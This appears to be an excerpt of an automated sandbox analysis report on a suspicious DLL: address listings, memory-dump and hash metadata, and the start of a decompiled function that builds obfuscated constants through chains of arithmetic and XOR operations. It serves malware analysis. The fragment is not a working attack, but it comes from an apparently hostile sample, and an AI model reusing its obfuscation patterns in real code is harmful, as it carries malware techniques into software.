                                                                                                                                                                                      0x003e1f66
                                                                                                                                                                                      0x003e1f6e
                                                                                                                                                                                      0x003e1f73
                                                                                                                                                                                      0x003e1f7b
                                                                                                                                                                                      0x003e1f83
                                                                                                                                                                                      0x003e1f8b
                                                                                                                                                                                      0x003e1f93
                                                                                                                                                                                      0x003e1f9b
                                                                                                                                                                                      0x003e1fa3
                                                                                                                                                                                      0x003e1fab
                                                                                                                                                                                      0x003e1fb3
                                                                                                                                                                                      0x003e1fbb
                                                                                                                                                                                      0x003e1fc0
                                                                                                                                                                                      0x003e1fc8
                                                                                                                                                                                      0x003e1fd3
                                                                                                                                                                                      0x003e1fdb
                                                                                                                                                                                      0x003e1fe3
                                                                                                                                                                                      0x003e1fee
                                                                                                                                                                                      0x003e1ff9
                                                                                                                                                                                      0x003e2004
                                                                                                                                                                                      0x003e200f
                                                                                                                                                                                      0x003e201a
                                                                                                                                                                                      0x003e2025
                                                                                                                                                                                      0x003e2030
                                                                                                                                                                                      0x003e203b
                                                                                                                                                                                      0x003e2044
                                                                                                                                                                                      0x003e2049
                                                                                                                                                                                      0x003e2052
                                                                                                                                                                                      0x003e2059
                                                                                                                                                                                      0x003e205e
                                                                                                                                                                                      0x003e2067
                                                                                                                                                                                      0x003e2072
                                                                                                                                                                                      0x003e207d
                                                                                                                                                                                      0x003e2090
                                                                                                                                                                                      0x003e2091
                                                                                                                                                                                      0x003e2098
                                                                                                                                                                                      0x003e20a3
                                                                                                                                                                                      0x003e20b6
                                                                                                                                                                                      0x003e20bd
                                                                                                                                                                                      0x003e20c8
                                                                                                                                                                                      0x003e20d3
                                                                                                                                                                                      0x003e20e1
                                                                                                                                                                                      0x003e20ea
                                                                                                                                                                                      0x003e20f7
                                                                                                                                                                                      0x003e20fa
                                                                                                                                                                                      0x003e20fe
                                                                                                                                                                                      0x003e2106
                                                                                                                                                                                      0x003e210e
                                                                                                                                                                                      0x003e2116
                                                                                                                                                                                      0x003e211e
                                                                                                                                                                                      0x003e2122
                                                                                                                                                                                      0x003e212a
                                                                                                                                                                                      0x003e2135
                                                                                                                                                                                      0x003e2148
                                                                                                                                                                                      0x003e214f
                                                                                                                                                                                      0x003e215a
                                                                                                                                                                                      0x003e2162
                                                                                                                                                                                      0x003e2167
                                                                                                                                                                                      0x003e216f
                                                                                                                                                                                      0x003e2177
                                                                                                                                                                                      0x003e217f
                                                                                                                                                                                      0x003e2187
                                                                                                                                                                                      0x003e2197
                                                                                                                                                                                      0x003e21a0
                                                                                                                                                                                      0x003e21a1
                                                                                                                                                                                      0x003e21a5
                                                                                                                                                                                      0x003e21ad
                                                                                                                                                                                      0x003e21b8
                                                                                                                                                                                      0x003e21c0
                                                                                                                                                                                      0x003e21c8
                                                                                                                                                                                      0x003e21d3
                                                                                                                                                                                      0x003e21de
                                                                                                                                                                                      0x003e21e6
                                                                                                                                                                                      0x003e21f1
                                                                                                                                                                                      0x003e21fc
                                                                                                                                                                                      0x003e2210
                                                                                                                                                                                      0x003e2217
                                                                                                                                                                                      0x003e2222
                                                                                                                                                                                      0x003e222f
                                                                                                                                                                                      0x003e2233
                                                                                                                                                                                      0x003e223b
                                                                                                                                                                                      0x003e2240
                                                                                                                                                                                      0x003e2248
                                                                                                                                                                                      0x003e2253
                                                                                                                                                                                      0x003e225e
                                                                                                                                                                                      0x003e2269
                                                                                                                                                                                      0x003e227c
                                                                                                                                                                                      0x003e2283
                                                                                                                                                                                      0x003e228e
                                                                                                                                                                                      0x003e2299
                                                                                                                                                                                      0x003e22a4
                                                                                                                                                                                      0x003e22ac
                                                                                                                                                                                      0x003e22b7
                                                                                                                                                                                      0x003e22c2
                                                                                                                                                                                      0x003e22cd
                                                                                                                                                                                      0x003e22d8
                                                                                                                                                                                      0x003e22e0
                                                                                                                                                                                      0x003e22e5
                                                                                                                                                                                      0x003e22ed
                                                                                                                                                                                      0x003e22f5
                                                                                                                                                                                      0x003e22fd
                                                                                                                                                                                      0x003e2305
                                                                                                                                                                                      0x003e230d
                                                                                                                                                                                      0x003e2317
                                                                                                                                                                                      0x003e231b
                                                                                                                                                                                      0x003e2323
                                                                                                                                                                                      0x003e232e
                                                                                                                                                                                      0x003e2339
                                                                                                                                                                                      0x003e2344
                                                                                                                                                                                      0x003e2354
                                                                                                                                                                                      0x003e2359
                                                                                                                                                                                      0x003e235f
                                                                                                                                                                                      0x003e2367
                                                                                                                                                                                      0x003e236f
                                                                                                                                                                                      0x003e2377
                                                                                                                                                                                      0x003e237f
                                                                                                                                                                                      0x003e2388
                                                                                                                                                                                      0x003e238b
                                                                                                                                                                                      0x003e238f
                                                                                                                                                                                      0x003e2397
                                                                                                                                                                                      0x003e239f
                                                                                                                                                                                      0x003e23a7
                                                                                                                                                                                      0x003e23af
                                                                                                                                                                                      0x003e23b7
                                                                                                                                                                                      0x003e23bc
                                                                                                                                                                                      0x003e23c4
                                                                                                                                                                                      0x003e23cc
                                                                                                                                                                                      0x003e23d1
                                                                                                                                                                                      0x003e23d9
                                                                                                                                                                                      0x003e23e1
                                                                                                                                                                                      0x003e23e9
                                                                                                                                                                                      0x003e23f1
                                                                                                                                                                                      0x003e23fe
                                                                                                                                                                                      0x003e2402
                                                                                                                                                                                      0x003e2407
                                                                                                                                                                                      0x003e240f
                                                                                                                                                                                      0x003e241a
                                                                                                                                                                                      0x003e2422
                                                                                                                                                                                      0x003e242d
                                                                                                                                                                                      0x003e2443
                                                                                                                                                                                      0x003e244a
                                                                                                                                                                                      0x003e2452
                                                                                                                                                                                      0x003e245d
                                                                                                                                                                                      0x003e2469
                                                                                                                                                                                      0x003e246e
                                                                                                                                                                                      0x003e2474
                                                                                                                                                                                      0x003e2479
                                                                                                                                                                                      0x003e247e
                                                                                                                                                                                      0x003e2486
                                                                                                                                                                                      0x003e2492
                                                                                                                                                                                      0x003e2497
                                                                                                                                                                                      0x003e249d
                                                                                                                                                                                      0x003e24a5
                                                                                                                                                                                      0x003e24ad
                                                                                                                                                                                      0x003e24b5
                                                                                                                                                                                      0x003e24c0
                                                                                                                                                                                      0x003e24cf
                                                                                                                                                                                      0x003e24d2
                                                                                                                                                                                      0x003e24d9
                                                                                                                                                                                      0x003e24e4
                                                                                                                                                                                      0x003e24ef
                                                                                                                                                                                      0x003e24f7
                                                                                                                                                                                      0x003e2502
                                                                                                                                                                                      0x003e250d
                                                                                                                                                                                      0x003e2515
                                                                                                                                                                                      0x003e2520
                                                                                                                                                                                      0x003e252b
                                                                                                                                                                                      0x003e2533
                                                                                                                                                                                      0x003e2544
                                                                                                                                                                                      0x003e2547
                                                                                                                                                                                      0x003e254e
                                                                                                                                                                                      0x003e2556
                                                                                                                                                                                      0x003e2561
                                                                                                                                                                                      0x003e256c
                                                                                                                                                                                      0x003e2574
                                                                                                                                                                                      0x003e257f
                                                                                                                                                                                      0x003e258c
                                                                                                                                                                                      0x003e2595
                                                                                                                                                                                      0x003e2599
                                                                                                                                                                                      0x003e259e
                                                                                                                                                                                      0x003e25a6
                                                                                                                                                                                      0x003e25b1
                                                                                                                                                                                      0x003e25bc
                                                                                                                                                                                      0x003e25c7
                                                                                                                                                                                      0x003e25d2
                                                                                                                                                                                      0x003e25e8
                                                                                                                                                                                      0x003e25ef
                                                                                                                                                                                      0x003e25fa
                                                                                                                                                                                      0x003e2605
                                                                                                                                                                                      0x003e2617
                                                                                                                                                                                      0x003e261c
                                                                                                                                                                                      0x003e2625
                                                                                                                                                                                      0x003e2630
                                                                                                                                                                                      0x003e2638
                                                                                                                                                                                      0x003e2640
                                                                                                                                                                                      0x003e2648
                                                                                                                                                                                      0x003e264d
                                                                                                                                                                                      0x003e2655
                                                                                                                                                                                      0x003e265d
                                                                                                                                                                                      0x003e2665
                                                                                                                                                                                      0x003e266a
                                                                                                                                                                                      0x003e2672
                                                                                                                                                                                      0x003e267a
                                                                                                                                                                                      0x003e2685
                                                                                                                                                                                      0x003e268d
                                                                                                                                                                                      0x003e2698
                                                                                                                                                                                      0x003e26aa
                                                                                                                                                                                      0x003e26af
                                                                                                                                                                                      0x003e26b8
                                                                                                                                                                                      0x003e26c3
                                                                                                                                                                                      0x003e26ce
                                                                                                                                                                                      0x003e26e0
                                                                                                                                                                                      0x003e26e3
                                                                                                                                                                                      0x003e26ea
                                                                                                                                                                                      0x003e26f5
                                                                                                                                                                                      0x003e2700
                                                                                                                                                                                      0x003e2708
                                                                                                                                                                                      0x003e2710
                                                                                                                                                                                      0x003e2718
                                                                                                                                                                                      0x003e271d
                                                                                                                                                                                      0x003e2725
                                                                                                                                                                                      0x003e2730
                                                                                                                                                                                      0x003e273b
                                                                                                                                                                                      0x003e2746
                                                                                                                                                                                      0x003e2751
                                                                                                                                                                                      0x003e275c
                                                                                                                                                                                      0x003e2767
                                                                                                                                                                                      0x003e2772
                                                                                                                                                                                      0x003e277d
                                                                                                                                                                                      0x003e2788
                                                                                                                                                                                      0x003e2793
                                                                                                                                                                                      0x003e279b
                                                                                                                                                                                      0x003e27a3
                                                                                                                                                                                      0x003e27ae
                                                                                                                                                                                      0x003e27b9
                                                                                                                                                                                      0x003e27c4
                                                                                                                                                                                      0x003e27d3
                                                                                                                                                                                      0x003e27d8
                                                                                                                                                                                      0x003e27df
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e6
                                                                                                                                                                                      0x003e27e6
                                                                                                                                                                                      0x003e27e6
                                                                                                                                                                                      0x003e27e6
                                                                                                                                                                                      0x003e27ec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e27f2
                                                                                                                                                                                      0x003e2999
                                                                                                                                                                                      0x003e29be
                                                                                                                                                                                      0x003e29c5
                                                                                                                                                                                      0x003e29ca
                                                                                                                                                                                      0x003e29cd
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27f8
                                                                                                                                                                                      0x003e27fe
                                                                                                                                                                                      0x003e2928
                                                                                                                                                                                      0x003e2937
                                                                                                                                                                                      0x003e293d
                                                                                                                                                                                      0x003e2956
                                                                                                                                                                                      0x003e2977
                                                                                                                                                                                      0x003e297f
                                                                                                                                                                                      0x003e2984
                                                                                                                                                                                      0x003e2987
                                                                                                                                                                                      0x003e2989
                                                                                                                                                                                      0x003e298f
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e2804
                                                                                                                                                                                      0x003e2806
                                                                                                                                                                                      0x003e289a
                                                                                                                                                                                      0x003e28e2
                                                                                                                                                                                      0x003e28f6
                                                                                                                                                                                      0x003e28fd
                                                                                                                                                                                      0x003e2902
                                                                                                                                                                                      0x003e2905
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e280c
                                                                                                                                                                                      0x003e2812
                                                                                                                                                                                      0x003e2870
                                                                                                                                                                                      0x003e2874
                                                                                                                                                                                      0x003e2879
                                                                                                                                                                                      0x003e287b
                                                                                                                                                                                      0x003e287e
                                                                                                                                                                                      0x003e2885
                                                                                                                                                                                      0x003e288a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e2814
                                                                                                                                                                                      0x003e281a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e2bfe
                                                                                                                                                                                      0x003e2826
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e282c
                                                                                                                                                                                      0x003e2840
                                                                                                                                                                                      0x003e2844
                                                                                                                                                                                      0x003e2849
                                                                                                                                                                                      0x003e284c
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e2826
                                                                                                                                                                                      0x003e2812
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e2806
                                                                                                                                                                                      0x003e27fe
                                                                                                                                                                                      0x003e2c09
                                                                                                                                                                                      0x003e2c09
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e2c09
                                                                                                                                                                                      0x003e29d7
                                                                                                                                                                                      0x003e29dd
                                                                                                                                                                                      0x003e2bb5
                                                                                                                                                                                      0x003e2bbc
                                                                                                                                                                                      0x003e2bc1
                                                                                                                                                                                      0x003e2bc4
                                                                                                                                                                                      0x003e2bc9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e29e3
                                                                                                                                                                                      0x003e29e3
                                                                                                                                                                                      0x003e29e9
                                                                                                                                                                                      0x003e2b6e
                                                                                                                                                                                      0x003e2b7c
                                                                                                                                                                                      0x003e2b81
                                                                                                                                                                                      0x003e2b86
                                                                                                                                                                                      0x003e2b8e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e29ef
                                                                                                                                                                                      0x003e29ef
                                                                                                                                                                                      0x003e29f5
                                                                                                                                                                                      0x003e2b1b
                                                                                                                                                                                      0x003e2b29
                                                                                                                                                                                      0x003e2b2a
                                                                                                                                                                                      0x003e2b2c
                                                                                                                                                                                      0x003e2b33
                                                                                                                                                                                      0x003e2b3a
                                                                                                                                                                                      0x003e2b45
                                                                                                                                                                                      0x003e2b47
                                                                                                                                                                                      0x003e2b49
                                                                                                                                                                                      0x003e2b4e
                                                                                                                                                                                      0x003e2b51
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e29fb
                                                                                                                                                                                      0x003e29fb
                                                                                                                                                                                      0x003e2a01
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e2a07
                                                                                                                                                                                      0x003e2a2b
                                                                                                                                                                                      0x003e2a51
                                                                                                                                                                                      0x003e2a56
                                                                                                                                                                                      0x003e2a62
                                                                                                                                                                                      0x003e2a73
                                                                                                                                                                                      0x003e2a86
                                                                                                                                                                                      0x003e2abd
                                                                                                                                                                                      0x003e2adb
                                                                                                                                                                                      0x003e2ae4
                                                                                                                                                                                      0x003e2b01
                                                                                                                                                                                      0x003e2b06
                                                                                                                                                                                      0x003e2b09
                                                                                                                                                                                      0x003e2b0b
                                                                                                                                                                                      0x003e2b11
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e27e1
                                                                                                                                                                                      0x003e2b0b
                                                                                                                                                                                      0x003e2a01
                                                                                                                                                                                      0x003e29f5
                                                                                                                                                                                      0x003e29e9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e2bce
                                                                                                                                                                                      0x003e2bce
                                                                                                                                                                                      0x003e2bce
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e27e6

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: "tK$$g $$c$*QD$-Z1$1d$:Bp!$:&$A$0$EUH$E`K$V=9$XV$ )wEUH$P$W
                                                                                                                                                                                      • API String ID: 0-3509732160
                                                                                                                                                                                      • Opcode ID: 45a2065384f167568cda708d5e87d96877fe695d7ddaf1dcc22df4cc45261b8a
                                                                                                                                                                                      • Instruction ID: 4a4f8d7ede161941e506c68edc958a1606239d32acf48c62dba64b224658b547
                                                                                                                                                                                      • Opcode Fuzzy Hash: 45a2065384f167568cda708d5e87d96877fe695d7ddaf1dcc22df4cc45261b8a
                                                                                                                                                                                      • Instruction Fuzzy Hash: E872EF725083809BD379CF25C58AB8BBBE1FBD4308F108A1DE5DA96260D7B19949CF53
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                      			E003D996C(signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
                                                                                                                                                                                      				signed int* _v4;
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                      				signed int _v72;
                                                                                                                                                                                      				signed int _v76;
                                                                                                                                                                                      				signed int _v80;
                                                                                                                                                                                      				signed int _v84;
                                                                                                                                                                                      				signed int _v88;
                                                                                                                                                                                      				signed int _v92;
                                                                                                                                                                                      				signed int _v96;
                                                                                                                                                                                      				signed int _v100;
                                                                                                                                                                                      				signed int _v104;
                                                                                                                                                                                      				signed int _v108;
                                                                                                                                                                                      				signed int _v112;
                                                                                                                                                                                      				signed int _v116;
                                                                                                                                                                                      				signed int _v120;
                                                                                                                                                                                      				signed int _v124;
                                                                                                                                                                                      				signed int _v128;
                                                                                                                                                                                      				signed int _v132;
                                                                                                                                                                                      				signed int _v136;
                                                                                                                                                                                      				signed int _v140;
                                                                                                                                                                                      				signed int _v144;
                                                                                                                                                                                      				signed int _v148;
                                                                                                                                                                                      				signed int _v152;
                                                                                                                                                                                      				signed int _v156;
                                                                                                                                                                                      				signed int _v160;
                                                                                                                                                                                      				signed int _v164;
                                                                                                                                                                                      				signed int _v168;
                                                                                                                                                                                      				signed int _v172;
                                                                                                                                                                                      				signed int _v176;
                                                                                                                                                                                      				signed int _v180;
                                                                                                                                                                                      				signed int _v184;
                                                                                                                                                                                      				signed int _v188;
                                                                                                                                                                                      				signed int _v192;
                                                                                                                                                                                      				signed int _v196;
                                                                                                                                                                                      				signed int _v200;
                                                                                                                                                                                      				signed int _v204;
                                                                                                                                                                                      				signed int _v208;
                                                                                                                                                                                      				signed int _v212;
                                                                                                                                                                                      				signed int _v216;
                                                                                                                                                                                      				signed int _v220;
                                                                                                                                                                                      				signed int _v224;
                                                                                                                                                                                      				signed int _v228;
                                                                                                                                                                                      				signed int _v232;
                                                                                                                                                                                      				signed int _v236;
                                                                                                                                                                                      				signed int _v240;
                                                                                                                                                                                      				signed int _v244;
                                                                                                                                                                                      				signed int _v248;
                                                                                                                                                                                      				signed int _v252;
                                                                                                                                                                                      				signed int _v256;
                                                                                                                                                                                      				signed int _v260;
                                                                                                                                                                                      				signed int _v264;
                                                                                                                                                                                      				signed int _v268;
                                                                                                                                                                                      				void* __ecx;
                                                                                                                                                                                      				signed int _t757;
                                                                                                                                                                                      				void* _t765;
                                                                                                                                                                                      				signed int _t769;
                                                                                                                                                                                      				signed int _t775;
                                                                                                                                                                                      				signed int _t786;
                                                                                                                                                                                      				signed int _t788;
                                                                                                                                                                                      				signed int _t789;
                                                                                                                                                                                      				signed int _t790;
                                                                                                                                                                                      				signed int _t791;
                                                                                                                                                                                      				signed int _t792;
                                                                                                                                                                                      				signed int _t793;
                                                                                                                                                                                      				signed int _t794;
                                                                                                                                                                                      				signed int _t795;
                                                                                                                                                                                      				signed int _t796;
                                                                                                                                                                                      				signed int _t797;
                                                                                                                                                                                      				signed int _t798;
                                                                                                                                                                                      				signed int _t799;
                                                                                                                                                                                      				signed int _t800;
                                                                                                                                                                                      				signed int _t801;
                                                                                                                                                                                      				signed int _t802;
                                                                                                                                                                                      				signed int _t803;
                                                                                                                                                                                      				signed int _t804;
                                                                                                                                                                                      				void* _t805;
                                                                                                                                                                                      				signed int _t814;
                                                                                                                                                                                      				intOrPtr* _t823;
                                                                                                                                                                                      				void* _t874;
                                                                                                                                                                                      				signed int _t891;
                                                                                                                                                                                      				signed int _t892;
                                                                                                                                                                                      				signed int _t893;
                                                                                                                                                                                      				signed int _t895;
                                                                                                                                                                                      				signed int* _t902;
                                                                                                                                                                                      				void* _t904;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a40);
                                                                                                                                                                                      				_push(_a36);
                                                                                                                                                                                      				_v4 = __edx;
                                                                                                                                                                                      				_push(_a32);
                                                                                                                                                                                      				_push(_a28);
                                                                                                                                                                                      				_push(_a24);
                                                                                                                                                                                      				_push(_a20 & 0x0000ffff);
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_push(_a12);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				E003D8002(_a20 & 0x0000ffff);
                                                                                                                                                                                      				_v264 = 0xc60fd9;
                                                                                                                                                                                      				_v264 = _v264 >> 0xb;
                                                                                                                                                                                      				_t902 =  &(( &_v268)[0xc]);
                                                                                                                                                                                      				_v264 = _v264 ^ 0xb6865c26;
                                                                                                                                                                                      				_v264 = _v264 ^ 0xb68644e7;
                                                                                                                                                                                      				_t786 = 0;
                                                                                                                                                                                      				_v232 = 0x94febf;
                                                                                                                                                                                      				_t893 = 0x15b98a1;
                                                                                                                                                                                      				_v232 = _v232 << 0xd;
                                                                                                                                                                                      				_v232 = _v232 + 0xffff7487;
                                                                                                                                                                                      				_v232 = _v232 ^ 0x8b0095cf;
                                                                                                                                                                                      				_v232 = _v232 ^ 0x14d7c15b;
                                                                                                                                                                                      				_v132 = 0x739728;
                                                                                                                                                                                      				_v132 = _v132 + 0x181a;
                                                                                                                                                                                      				_v132 = _v132 + 0xffff9c9c;
                                                                                                                                                                                      				_v132 = _v132 ^ 0x00734b16;
                                                                                                                                                                                      				_v188 = 0x783031;
                                                                                                                                                                                      				_v188 = _v188 << 5;
                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                      				_t788 = 0x6e;
                                                                                                                                                                                      				_v188 = _v188 * 0x59;
                                                                                                                                                                                      				_v188 = _v188 ^ 0x3918a120;
                                                                                                                                                                                      				_v148 = 0xdd82e;
                                                                                                                                                                                      				_v148 = _v148 | 0xe4e540fc;
                                                                                                                                                                                      				_v148 = _v148 + 0xc534;
                                                                                                                                                                                      				_v148 = _v148 ^ 0xe4eede32;
                                                                                                                                                                                      				_v116 = 0x899f5;
                                                                                                                                                                                      				_v116 = _v116 / _t788;
                                                                                                                                                                                      				_v116 = _v116 + 0x5648;
                                                                                                                                                                                      				_v116 = _v116 ^ 0x00406a4c;
                                                                                                                                                                                      				_v156 = 0x9ca5d6;
                                                                                                                                                                                      				_t789 = 0x1c;
                                                                                                                                                                                      				_t891 = 0x7b;
                                                                                                                                                                                      				_v156 = _v156 * 0x64;
                                                                                                                                                                                      				_v156 = _v156 << 9;
                                                                                                                                                                                      				_v156 = _v156 ^ 0x618b3000;
                                                                                                                                                                                      				_v32 = 0xd5cd6e;
                                                                                                                                                                                      				_v32 = _v32 / _t789;
                                                                                                                                                                                      				_v32 = _v32 ^ 0x0407a2c3;
                                                                                                                                                                                      				_v64 = 0x23343;
                                                                                                                                                                                      				_v64 = _v64 / _t891;
                                                                                                                                                                                      				_v64 = _v64 ^ 0x00080494;
                                                                                                                                                                                      				_v252 = 0xfa5485;
                                                                                                                                                                                      				_v252 = _v252 * 0x42;
                                                                                                                                                                                      				_v252 = _v252 | 0xc32886a6;
                                                                                                                                                                                      				_t790 = 0x50;
                                                                                                                                                                                      				_v252 = _v252 * 0x35;
                                                                                                                                                                                      				_v252 = _v252 ^ 0x8227d546;
                                                                                                                                                                                      				_v224 = 0x2e8bf6;
                                                                                                                                                                                      				_v224 = _v224 | 0xf76545cb;
                                                                                                                                                                                      				_v224 = _v224 / _t790;
                                                                                                                                                                                      				_v224 = _v224 << 6;
                                                                                                                                                                                      				_v224 = _v224 ^ 0xc5f30dc0;
                                                                                                                                                                                      				_v16 = 0x78ee4b;
                                                                                                                                                                                      				_v16 = _v16 << 1;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x80f1dc96;
                                                                                                                                                                                      				_v208 = 0x791fee;
                                                                                                                                                                                      				_v208 = _v208 >> 8;
                                                                                                                                                                                      				_v208 = _v208 >> 2;
                                                                                                                                                                                      				_v208 = _v208 >> 0xb;
                                                                                                                                                                                      				_v208 = _v208 ^ 0x00000003;
                                                                                                                                                                                      				_v152 = 0xbd5041;
                                                                                                                                                                                      				_t791 = 5;
                                                                                                                                                                                      				_v152 = _v152 / _t791;
                                                                                                                                                                                      				_v152 = _v152 + 0x721a;
                                                                                                                                                                                      				_v152 = _v152 ^ 0x00264eb2;
                                                                                                                                                                                      				_v136 = 0x6c2d31;
                                                                                                                                                                                      				_v136 = _v136 + 0xffff6aee;
                                                                                                                                                                                      				_v136 = _v136 ^ 0x21760cef;
                                                                                                                                                                                      				_v136 = _v136 ^ 0x211d94ef;
                                                                                                                                                                                      				_v120 = 0x6ceb08;
                                                                                                                                                                                      				_v120 = _v120 + 0xffffcbf6;
                                                                                                                                                                                      				_v120 = _v120 ^ 0x9f43d110;
                                                                                                                                                                                      				_v120 = _v120 ^ 0x9f2f67f1;
                                                                                                                                                                                      				_v88 = 0xc74391;
                                                                                                                                                                                      				_v88 = _v88 + 0xffff6c5e;
                                                                                                                                                                                      				_v88 = _v88 ^ 0x00c6afec;
                                                                                                                                                                                      				_v128 = 0x4b3465;
                                                                                                                                                                                      				_v128 = _v128 | 0xcf5ecbdf;
                                                                                                                                                                                      				_v128 = _v128 ^ 0xcf5ffeff;
                                                                                                                                                                                      				_v264 = 0xfd23b8;
                                                                                                                                                                                      				_t792 = 0x4e;
                                                                                                                                                                                      				_v264 = _v264 / _t792;
                                                                                                                                                                                      				_t793 = 0x45;
                                                                                                                                                                                      				_v264 = _v264 / _t793;
                                                                                                                                                                                      				_v264 = _v264 ^ 0x0002f78a;
                                                                                                                                                                                      				_v264 = 0xfa9619;
                                                                                                                                                                                      				_t794 = 0x1e;
                                                                                                                                                                                      				_v264 = _v264 / _t794;
                                                                                                                                                                                      				_v264 = _v264 + 0xffffb0fb;
                                                                                                                                                                                      				_v264 = _v264 ^ 0x000b775c;
                                                                                                                                                                                      				_v264 = 0x807ba4;
                                                                                                                                                                                      				_v264 = _v264 << 4;
                                                                                                                                                                                      				_v264 = _v264 << 0xa;
                                                                                                                                                                                      				_v264 = _v264 ^ 0x1ee80ab8;
                                                                                                                                                                                      				_v264 = 0x9af257;
                                                                                                                                                                                      				_v264 = _v264 << 0xb;
                                                                                                                                                                                      				_v264 = _v264 * 0x56;
                                                                                                                                                                                      				_v264 = _v264 ^ 0x6b422079;
                                                                                                                                                                                      				_v268 = 0x26ec4d;
                                                                                                                                                                                      				_v268 = _v268 << 0xc;
                                                                                                                                                                                      				_v268 = _v268 >> 0xe;
                                                                                                                                                                                      				_v268 = _v268 ^ 0xbf1cc723;
                                                                                                                                                                                      				_v268 = _v268 ^ 0xbf1316e8;
                                                                                                                                                                                      				_v268 = 0x604ef4;
                                                                                                                                                                                      				_v268 = _v268 | 0xbb4d6b52;
                                                                                                                                                                                      				_v268 = _v268 >> 5;
                                                                                                                                                                                      				_t795 = 0x18;
                                                                                                                                                                                      				_v268 = _v268 / _t795;
                                                                                                                                                                                      				_v268 = _v268 ^ 0x003fa9db;
                                                                                                                                                                                      				_v268 = 0xff1eaf;
                                                                                                                                                                                      				_v268 = _v268 << 8;
                                                                                                                                                                                      				_t796 = 0xa;
                                                                                                                                                                                      				_v268 = _v268 * 0x6c;
                                                                                                                                                                                      				_v268 = _v268 >> 0xc;
                                                                                                                                                                                      				_v268 = _v268 ^ 0x000cb5e2;
                                                                                                                                                                                      				_v260 = 0xc7e312;
                                                                                                                                                                                      				_v260 = _v260 | 0x4ced50b1;
                                                                                                                                                                                      				_v260 = _v260 ^ 0x4ce89335;
                                                                                                                                                                                      				_v260 = 0xaa4ecb;
                                                                                                                                                                                      				_v260 = _v260 << 0x10;
                                                                                                                                                                                      				_v260 = _v260 ^ 0x4ec443b3;
                                                                                                                                                                                      				_v264 = 0x38c20f;
                                                                                                                                                                                      				_v264 = _v264 >> 9;
                                                                                                                                                                                      				_v264 = _v264 | 0x7754c32c;
                                                                                                                                                                                      				_v264 = _v264 ^ 0x775a6c62;
                                                                                                                                                                                      				_v268 = 0xc43478;
                                                                                                                                                                                      				_v268 = _v268 * 0x54;
                                                                                                                                                                                      				_v268 = _v268 ^ 0x37dd0540;
                                                                                                                                                                                      				_v268 = _v268 + 0x34a3;
                                                                                                                                                                                      				_v268 = _v268 ^ 0x77bf44fd;
                                                                                                                                                                                      				_v268 = 0x77fa17;
                                                                                                                                                                                      				_v268 = _v268 + 0xffffb1ac;
